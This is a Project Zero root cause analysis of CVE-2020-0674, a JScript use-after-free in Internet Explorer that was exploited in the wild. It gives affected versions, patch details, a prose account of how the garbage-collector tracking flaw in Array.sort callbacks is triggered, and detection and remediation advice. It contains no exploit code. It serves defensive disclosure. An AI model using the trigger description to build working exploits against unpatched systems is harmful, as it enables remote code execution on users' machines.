CVE-2020-0674: JScript Use-after-Free in Internet Explorer

Posted by Maddie Stone, Project Zero (2020-08-05)

Disclosure or Patch Date: 11 February 2020
Product: Microsoft Internet Explorer
Affected Versions: For Windows 10 1903/1909, KB4528760 and previous
First Patched Version: For Windows 10 1903/1909, KB4532693
Issue/Bug Report:  N/A
Patch CL: N/A
Bug-Introducing CL: N/A
Access to the exploit sample? Yes
Reporter(s): 
Yi Huang(@C0rk1_H) & Kang Yang(@dnpushme) of Qihoo 360 ATA, Clément Lecigne of Google’s Threat Analysis Group

Bug Class: use-after-free (UAF)
Vulnerability Details: This vulnerability is almost exactly the same as CVE-2019-1367 except that named arguments aren’t tracked rather than the arguments array

The vulnerability is a member of the use-after-free bug class in JScript where variables (represented by the VAR structure) aren’t properly tracked by the garbage collector. In this case, the named arguments are not tracked by the garbage collector during the Array.sort callback. Thus, during the Array.sort callback, it is possible to assign a variable to one of the named arguments, have it garbage-collected (as long as it is not referenced anywhere else) and still access it later, causing the use-after-free.

Is the exploit method known? Yes
Exploit method: This exploit uses the exact same exploit method as CVE-2019-1367, CVE-2020-1429, and CVE-2018-8653. Please see the CVE-2019-1367 root cause analysis for more details on the exploit method. 

How do you think you would have found this bug? Code auditing/variant analysis on the other JScript bugs that have been recently disclosed.

(Historical/present/future) context of bug: This vulnerability is a trivial variant of CVE-2019-1367/CVE-2019-1429 and thus shares the long history with that bug. There are now 4 JScript vulnerabilities (CVE-2018-8653, CVE-2019-1367, CVE-2019-1429, and CVE-2020-0674) of the same bug class, using the same exploitation method, that all have been exploited in the wild. 

Areas/approach for variant analysis: In all JScript callbacks, check that all of their variables are tracked by the GarbageCollector.

Found variants: N/A

Structural improvements: 
  • Bug classes should be fixed comprehensively, not just fixing each vulnerability individually.
  • Quality and complete patches need to be prioritized. CVE-2019-1367 was not fixed the first time or the second time and the trivial variant also wasn’t patched. This gave the attackers 3 distinct opportunities to exploit the vulnerability against the users, which they apparently did. Sharing proposed patches with the reporter could help identify these issues earlier. 
  • JScript and Internet Explorer are now considered “legacy” software. Removing them from being accessible by default in the Windows operating system would reduce the attack surface.

Potential detection methods for similar 0-days:
  • Look for any scripts that want to use JScript as their JS engine outside of a local intranet.
  • Look for scripts that use the Enumerator object due to that being Microsoft specific and one of the known methods for exploiting the UAF to get remote code execution.
  • Look for scripts that attempt to trigger CollectGarbage.

Other references:  

No comments:

Post a Comment